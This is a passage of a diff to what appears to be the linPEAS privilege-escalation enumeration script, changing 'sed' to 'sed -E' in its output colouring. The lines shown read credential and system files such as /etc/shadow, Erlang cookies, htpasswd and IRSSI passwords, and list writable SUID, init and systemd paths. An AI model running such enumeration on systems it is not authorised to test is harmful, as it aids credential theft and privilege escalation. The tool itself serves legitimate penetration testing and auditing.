else echo_not_found "vault-ssh-helper.hcl"
fi
echo ""
@ -2032,7 +2032,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions\n"$NC
screensess=`screen -ls 2>/dev/null`
if [ "$screensess" ]; then
printf "$screensess" | sed "s,.*,${C}[1;31m&${C}[0m," | sed "s,No Sockets found.*,${C}[32m&${C}[0m,"
printf "$screensess" | sed -E "s,.*,${C}[1;31m&${C}[0m," | sed -E "s,No Sockets found.*,${C}[32m&${C}[0m,"
else echo_not_found "screen"
fi
echo ""
@ -2043,7 +2043,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
printf $Y"[+] "$GREEN"Searching tmux sessions\n"$N
printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions\n"$NC
if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then
printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed "s,.*,${C}[1;31m&${C}[0m," | sed "s,no server running on.*,${C}[32m&${C}[0m,"
printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -E "s,.*,${C}[1;31m&${C}[0m," | sed -E "s,no server running on.*,${C}[32m&${C}[0m,"
else echo_not_found "tmux"
fi
echo ""
@ -2084,7 +2084,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
df=$(echo $d |cut -d ':' -f1)
dp=$(echo $d |cut -d ':' -f2-)
echo "Found possible PLAIN text creds in $df"
echo "$dp" | sed "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null
echo "$dp" | sed -E "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null
done
fi
echo ""
@ -2106,7 +2106,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
for d in $neo4j; do
if [ -r "$d" ]; then
echo "Found readable $d"
find $d -type f -name "auth" -exec cat {} \; 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null
find $d -type f -name "auth" -exec cat {} \; 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null
fi
done
echo ""
@ -2128,7 +2128,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
for f in $erlangcoo; do
if [ -r "$f" ]; then
echo "Found Erlang cookie: $f"
cat "$f" 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
cat "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"
fi
done
echo ""
@ -2164,7 +2164,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
for d in $irssifols; do
if [ -r "$d/config" ]; then
echo "Found IRSSI config file: $d/config"
cat "$d/config" 2>/dev/null | sed "s,password.*,${C}[1;31m&${C}[0m,"
cat "$d/config" 2>/dev/null | sed -E "s,password.*,${C}[1;31m&${C}[0m,"
fi
done
echo ""
@ -2185,9 +2185,9 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC
for s in `find / -perm -4000 2>/dev/null`; do
if [ -O "$s" ]; then
echo "You own the SUID file: $s" | sed "s,.*,${C}[1;31m&${C}[0m,"
echo "You own the SUID file: $s" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
elif [ -w "$s" ]; then #If write permision, win found (no check exploits)
echo "You can write SUID file: $s" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
echo "You can write SUID file: $s" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
else
c="a"
for b in $sidB; do
@ -2209,7 +2209,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC
for s in `find / -perm -g=s -type f 2>/dev/null`; do
if [ -w $s ]; then #If write permision, win found (no check exploits)
echo "You can write SUID file: $s" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
echo "You can write SUID file: $s" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
else
c="a"
for b in $sidB; do
@ -2235,7 +2235,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
if [ "`echo \"$l\" | grep include`" ]; then
ini_path="`echo \"$l\" | cut -d " " -f 2`"
fpath="`dirname \"$ini_path\"`"
if [ "`find \"$fpath\" -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find \"$fpath\" -type f -writable -or -user $USER 2>/dev/null`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find \"$fpath\" -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find \"$fpath\" -type f -writable -or -user $USER 2>/dev/null`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
printf $ITALIC"$fpath\n"$NC | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g"
for f in $fpath/*; do
printf $ITALIC" $f\n"$NC | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g"
@ -2259,7 +2259,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
for cb in "`getcap -r / 2>/dev/null`"; do
echo "$cb" | sed -E "s,$sudocapsB,${C}[1;31m&${C}[0m," | sed -E "s,$capsB,${C}[1;31m&${C}[0m,"
if [ -w "`echo \"$cb\" | cut -d \" \" -f1`" ]; then
echo "$cb is writable" | sed "s,.*,${C}[1;31m&${C}[0m,"
echo "$cb is writable" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
fi
done
echo ""
@ -2288,9 +2288,9 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
##-- IF) Unexpected folders in /
printf $Y"[+] "$GREEN"Unexpected folders in root\n"$NC
if [ "$MACPEAS" ]; then
(find / -maxdepth 1 -type d | grep -Ev "$commonrootdirsMacG" | sed "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found
(find / -maxdepth 1 -type d | grep -Ev "$commonrootdirsMacG" | sed -E "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found
else
(find / -maxdepth 1 -type d | grep -Ev "$commonrootdirsG" | sed "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found
(find / -maxdepth 1 -type d | grep -Ev "$commonrootdirsG" | sed -E "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found
fi
echo ""
@ -2299,9 +2299,9 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files\n"$NC
if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS
(ls -la /etc/profile.d/ | sed -E "s,$profiledG,${C}[1;32m&${C}[0m,") || echo_not_found "/etc/profile.d/"
if [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find /etc/profile.d/ -writable -or -user $USER`" ]; then echo "You have write privileges over `find /etc/profile.d/ -writable -or -user $USER`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find /etc/profile.d/ -writable -or -user $USER`" ]; then echo "You have write privileges over `find /etc/profile.d/ -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
fi
echo ""
@ -2309,46 +2309,46 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
printf $Y"[+] "$GREEN"Permissions in init, init.d, systemd, and rc.d\n"$NC
printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d\n"$NC
if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS
if [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find /etc/init/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init/ -type f -writable -or -user $USER`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find /etc/init.d/ -type f -writable -or -user $USER`" ]; then echo "You have write privileges over `find /etc/init.d/ -type f -writable -or -user $USER`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find /etc/rc.d/init.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d/init.d -type f -writable -or -user $USER`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find /usr/local/etc/rc.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /usr/local/etc/rc.d -type f -writable -or -user $USER`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find /etc/rc.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d -type f -writable -or -user $USER`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find /etc/systemd/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/systemd/ -type f -writable -or -user $USER`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find /lib/systemd/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /lib/systemd/ -type f -writable -or -user $USER`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find /etc/init/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init/ -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find /etc/init.d/ -type f -writable -or -user $USER`" ]; then echo "You have write privileges over `find /etc/init.d/ -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find /etc/rc.d/init.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d/init.d -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find /usr/local/etc/rc.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /usr/local/etc/rc.d -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find /etc/rc.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find /etc/systemd/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/systemd/ -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
if [ "`find /lib/systemd/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /lib/systemd/ -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi
fi
echo ""
##-- IF) Hashes in passwd file
printf $Y"[+] "$GREEN"Hashes inside passwd file? ........... "$NC
if [ "`grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null`" ]; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
if [ "`grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null`" ]; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"
else echo_no
fi
##-- IF) Writable in passwd file
printf $Y"[+] "$GREEN"Writable passwd file? ................ "$NC
if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
else echo_no
fi
##-- IF) Credentials in fstab
printf $Y"[+] "$GREEN"Credentials in fstab/mtab? ........... "$NC
if [ "`grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null`" ]; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
if [ "`grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null`" ]; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"
else echo_no
fi
##-- IF) Read shadow files
printf $Y"[+] "$GREEN"Can I read shadow files? ............. "$NC
if [ "`cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null`" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"
if [ "`cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null`" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"
else echo_no
fi
@ -2360,8 +2360,8 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
##-- IF) network-scripts
printf $Y"[+] "$GREEN"Can I write in network-scripts? ...... "$NC
if [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
elif [ "`find /etc/sysconfig/network-scripts/ -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges on `find /etc/sysconfig/network-scripts/ -writable -or -user $USER 2>/dev/null`" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
if [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
elif [ "`find /etc/sysconfig/network-scripts/ -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges on `find /etc/sysconfig/network-scripts/ -writable -or -user $USER 2>/dev/null`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"
else echo_no
fi
@ -2385,7 +2385,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
##-- IF) Readable files belonging to root and not world readable
if ! [ "$IAMROOT" ]; then
printf $Y"[+] "$GREEN"Readable files belonging to root and readable by me but not world readable\n"$NC
(for f in `find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal"`; do if [ -r $f ]; then ls -l $f 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m,"; fi; done) || echo_not_found
(for f in `find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal"`; do if [ -r $f ]; then ls -l $f 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi; done) || echo_not_found
echo ""
fi
@ -2505,7 +2505,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
echo ""
elif [ `echo $f | grep "htpasswd" ` ]; then
printf $GREEN"Reading $f\n"$NC
cat "$f" | sed "s,.*,${C}[1;31m&${C}[0m,"
cat "$f" | sed -E "s,.*,${C}[1;31m&${C}[0m,"
echo ""
fi;
fi;